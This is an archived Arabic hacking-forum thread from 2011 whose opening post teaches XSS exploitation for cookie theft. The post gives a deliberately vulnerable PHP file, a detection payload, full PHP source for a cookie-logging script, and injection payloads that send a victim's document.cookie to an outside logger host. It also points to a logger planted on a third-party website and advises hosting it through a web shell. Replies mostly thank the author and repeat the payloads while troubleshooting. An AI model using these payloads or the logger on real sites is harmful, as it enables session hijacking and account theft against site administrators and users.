:: vBspiders Professional Network ::
صفحة 1 من 11 1 23 الأخيرة »
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   حقن xss - ssi (http://www.vbspiders.com/vb/f427.html)
-   -   [ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~ (http://www.vbspiders.com/vb/t58067.html)

bleu moon 08-21-2011 03:26 PM
[ تم التجديد ] ~ شرح كامل متكامل لتغرات xss ~ | احترافي ..~
 
بسم الله الرحمآن الرحيم


ان شاء الله اليوم رح نشرح

\ اكتشاف تغرات xss
\ تعليق الآندكس من تغرات xss
\ سرقة كوكيز من تغرات xss



################

سرقة الكوكيز من تغرات xss

اولا لازم نقوم بتنصيب السيرفر الشخصي ع جهازنا :)

download

تانيا لازم يكون عندنا الموقع المصاب او السكربت :)
انا برمجة ملف عادي جدآآ ! مصاب بهذه التغره :nosweat:

نسميه مثلا ..~

xss.php

http://im9.gulfup.com/2011-08-21/1313925532191.jpg

ومحتواه علشان تجربوآا معي الاستغلال الكامل لها ..~

كود PHP:

<?
echo $_GET***91;'test'***93; ;

echo '<b>@nor15din</b>'
?>
http://im9.gulfup.com/2011-08-21/1313925815531.jpg

طيب الآن نستعرض الملف المصاب مع المتغير !

~~~~~~~~~~~~
على فكره شباب !
تم شرح التغره من قبل في المنتدى ..~
يستحسن انكم تراجعوا هذا الرابط ..~

http://www.vbspiders.com/vb/t24758.html

&

http://www.vbspiders.com/vb/t22376.html
~~~~~~~~~~~~

طيب نتابع :nosweat:


http://im9.gulfup.com/2011-08-21/1313926238671.jpg

طبعا كيف نكتشف التغره سهل كثير ..~
يعني تضيف الكود هذا

كود PHP:

'"--></style></script>***************("Www.VbspiderS.Com")</script> 
بعد المتغير ..~
رح ارفق لكم الكود في المرفقات مع كل حاجه !

طيب رح نضغط اوونتر ورح تشوف ان رساله ضهرت لنا في المتصفح ..~


http://im9.gulfup.com/2011-08-21/1313926438201.jpg

تعال الآن نستفيد من التغره !
اولا التغره تقدر تسرق بها كوكيز الآدمن او الضحيه بصفه عامه ..~
تقدر تحقن اكواد html او تغره للمتصفح ملغومه بباتش علشان تخترق ..~
شو هاي الحلاوه ..~
ههه
انا رح اشرح لكم كيف تسرق الكوكيز ..~
اولا لازمنا ملف لوج علشان يسجل لنا الكوكيز والمعلومات في ملف txt

ملفات اللوج تكون خاصه :(
وهناك ملفات لووج تجيب لك معلومات كامله !
كوكيز + الوقت + التاريخ + ...
وفي نوع آخر عادي ..~
يعطيك الكوكيز فقط !
ههع
رح اعطيكم ملف لووج عندي كثير حلو :in_love:

طيب نشوف السورس كود بتاعوا ..~

كود PHP:

<?php 


function GetIP() 

    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
        $ip getenv("HTTP_CLIENT_IP"); 
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
        $ip getenv("HTTP_X_FORWARDED_FOR"); 
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
        $ip getenv("REMOTE_ADDR"); 
    else if (isset($_SERVER***91;'REMOTE_ADDR'***93;) && $_SERVER***91;'REMOTE_ADDR'***93; && strcasecmp($_SERVER***91;'REMOTE_ADDR'***93;, "unknown")) 
        $ip $_SERVER***91;'REMOTE_ADDR'***93;; 
    else 
        $ip "unknown"
    return($ip); 


function logData() 

    $ipLog="nor15din.txt"
    $****** = $_SERVER***91;'QUERY_STRING'***93;; 
    $register_globals = (bool) ini_get('register_gobals'); 
    if ($register_globals$ip getenv('REMOTE_ADDR'); 
    else $ip GetIP(); 

    $rem_port $_SERVER***91;'REMOTE_PORT'***93;; 
    $user_agent $_SERVER***91;'HTTP_USER_AGENT'***93;; 
    $rqst_method $_SERVER***91;'METHOD'***93;; 
    $rem_host $_SERVER***91;'REMOTE_HOST'***93;; 
    $referer $_SERVER***91;'HTTP_REFERER'***93;; 
    $date=date ("l dS of F Y h:i:s A"); 
    $log=fopen("$ipLog""a+"); 

    if (preg_match("/\bhtm\b/i"$ipLog) || preg_match("/\bhtml\b/i"$ipLog)) 
        fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | ******:  $****** <br>"); 
    else 
        fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | ******:  $****** \n\n"); 
    fclose($log); 


logData();

echo '<b>powered by vbspiders team</b>'
?>
لازم نرفعوا على شل :(
انا عندي مرفوع على شل ..~


الموقع يلي رفعنا لو الووج رح يكون زي هيك مثلا !

www.vbspiders.com/log.php

ورح يسجل لنا المعلوومات في ملف اسموا nor15din.txt

www.vbspiders.com/nor15din.txt

:fruits_cherry:

طيب الآن كيف نستغل التغره ..~


يلزمنى كود تلغيم ..~

كود PHP:

"><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script> 
or

كود PHP:

"><script language= "JavaScript">********.location="http://vbspiders.com/log.php?******=" + ********.******;********.location="http://www.google.com"</script> 
حلو !
رح نضيف هذول الاكواد مع تغير مايجب تغيره


http://im9.gulfup.com/2011-08-21/1313927231191.jpg

اقتباس:
http://localhost/xss.php?test="><a href="#" onclick="********.location='http://vbspiders.com/log.php?******=' +escape(********.******);"><Click Me></a></script>
نضط اوونتر ونروح نفتح الملف nor15din.txt

اقتباس:
IP: | PORT: 56840 | HOST: | Agent: | METHOD: | REF: | DATE: | ******: ******=
ههههه حلو ..~
ياريت اي واحد ينقل الموضوع ..~
يحافض على الحقوق :(

:sadwalk:


لتحميل الادواة

~~~~~~~~~~~~~~~~~~

الشي يلي اضفناه وجديد هو اننا شرحنا كل شي تقريبا يتعلق بهذه التغره في فيديوا + صفحه HTML

:showoff:

لتحميل الشرح الكامل على شكل صفحه HTML

لتحميل فيديوا التطبيق

وفي الاخير هذيه بسيطه وهي ملف لوج مرفوووع وجاهز :)

http://www.illicitromance.com/log.php

وفي هذه الصفحه رح يتم تسجيل الكوكيز + المعلومات :)

http://www.illicitromance.com/nor15din.txt

ع فكره هذه طريقة اخرى لتعليق آندكس مميز من تغرات

xss

http://www.vbspiders.com/vb/t38054.html

~~~~~~~~~~~~

وهنا طريقة اخرى لاستغلال التغره مشروحة من طرف حبيبنا

IronMan

:bleh:

جديد استخدامات xss وهي الـ phishing login




بالتوفيق ..
@nor15din

Crazy Dz 08-21-2011 03:38 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
بارك الله فيك علي شرح ثغرة قوية

k4$p3r-MA 08-21-2011 03:40 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
:icon30::icon30: بارك الله فيك

bleu moon 08-21-2011 03:41 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Crazy Dz (المشاركة 388184)
بارك الله فيك علي شرح ثغرة قوية
والله تغره قويه خصوصا اذا كانت من نوع stored xss

:blushing:

bleu moon 08-21-2011 03:43 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة k4$p3r-MA (المشاركة 388186)
woooow thx fun بارك الله فيك
thx fun :schmoll:

شفتني العب مع القرده ؟

-------------------------------------

برب بمزح ههه
يعطيك العافيه يا حبيبي كاسبر !
الشرح فيديوا يلي قلت لي عنه رح انزلوا لك ان شاء الله :(

Dr.Mix 08-21-2011 04:51 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
مشكووووووووور اخ نورد الدين على الشرح الوافي ماشاء الله عليك دائما متوفق سلآم

bleu moon 08-21-2011 05:59 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Haboubamix (المشاركة 388198)
مشكووووووووور اخ نورد الدين على الشرح الوافي ماشاء الله عليك دائما متوفق سلآم
يعطيك العافيه ..~

:2:

Antivirus7 08-21-2011 06:10 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
وعليــكم السـلآم و رحمة الله
الله يعطيـك العآفية حبيبي نورالدين
شرح ممتآز تســلم أيديك :icon30:
تقبل مروري
:smile:

bleu moon 08-21-2011 06:57 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Antivirus7 (المشاركة 388218)
وعليــكم السـلآم و رحمة الله
الله يعطيـك العآفية حبيبي نورالدين
شرح ممتآز تســلم أيديك :icon30:
تقبل مروري
:smile:
منور الموضوع يا حلو والله :)
تسلم على المرور العطر

:blush-anim-cl:

DR.THMoORY 08-21-2011 09:15 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
بطل حبيبي..
يسلمو ايديك..

bleu moon 08-21-2011 09:26 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة DR.THMoORY (المشاركة 388252)
بطل حبيبي..
يسلمو ايديك..
منور الموضوع يا حبيبي

:fruits_cherry:

mass1993 08-21-2011 11:30 PM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

كود:
'"--></style></script>***************("Www.VBspiders.com")</script>
وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

كود:
\'\"
ولكن لما كتبت الامر هذا :

كود:
'"--></style></script>***************(4444444)</script>
وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

كود:
"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>
ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي

bleu moon 08-22-2011 07:35 AM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة mass1993 (المشاركة 388280)
يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

كود:
'"--></style></script>***************("Www.VBspiders.com")</script>
وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

كود:
\'\"
ولكن لما كتبت الامر هذا :

كود:
'"--></style></script>***************(4444444)</script>
وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

كود:
"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>
ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي
انت رافع ملف الوج على السيرفرا الشخصي وهذا غلط !
لازم يكون ع شل :(

:2:

dragonnet 08-22-2011 08:52 AM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
مشكور صديقي !!

bleu moon 08-22-2011 08:55 AM
رد: استغلال xss ..~ حتى استخراج الكوكيز ..~
 
اقتباس:
المشاركة الأصلية كتبت بواسطة dragonnet (المشاركة 388397)
مشكور صديقي !!
:2:


الساعة الآن 04:00 AM
صفحة 1 من 11 1 23 الأخيرة »
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0